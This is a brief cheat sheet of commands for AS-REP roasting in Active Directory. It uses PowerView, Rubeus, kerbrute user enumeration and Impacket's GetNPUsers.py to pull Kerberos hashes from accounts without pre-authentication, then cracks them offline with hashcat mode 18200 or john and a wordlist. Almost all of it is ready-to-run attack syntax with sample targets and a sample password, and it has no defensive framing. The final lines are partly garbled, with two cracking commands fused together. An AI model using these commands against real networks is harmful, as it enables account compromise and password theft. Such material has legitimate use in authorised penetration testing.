Get-DomainUser -PreauthNotRequired
# Extract from all domain accounts
.\\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
./kerbrute userenum <Wordlist> --dc <IP> --domain <Domain>
kerbrute userenum names.txt --dc 10.10.10.10 --domain security.local
# No domain credential. Bruteforce names with Wordlist
python2 GetNPUsers.py <Domain/> -dc-ip <IP> -usersfile <Wordlist> -format <john | hashcat> | grep -v 'Kerberos SessionError:'
python2 GetNPUsers.py security/ -dc-ip 10.10.10.10 -usersfile names.txt -format john | grep -v 'Kerberos SessionError:'
# Valid domain credentials. Extract from all domain accounts
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -format <john | hashcat> | grep "$krb5asrep$"
python2 GetNPUsers.py security.local/bart:'StrongPassword!!' -request -dc-ip 10.10.10.10 -format john | grep "$krb5asrep$"
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
Linux
john --wordlist rockyou.txt Hashes.txt hashcat -m 18200 -a 3 Hashes.txt rockyou.txt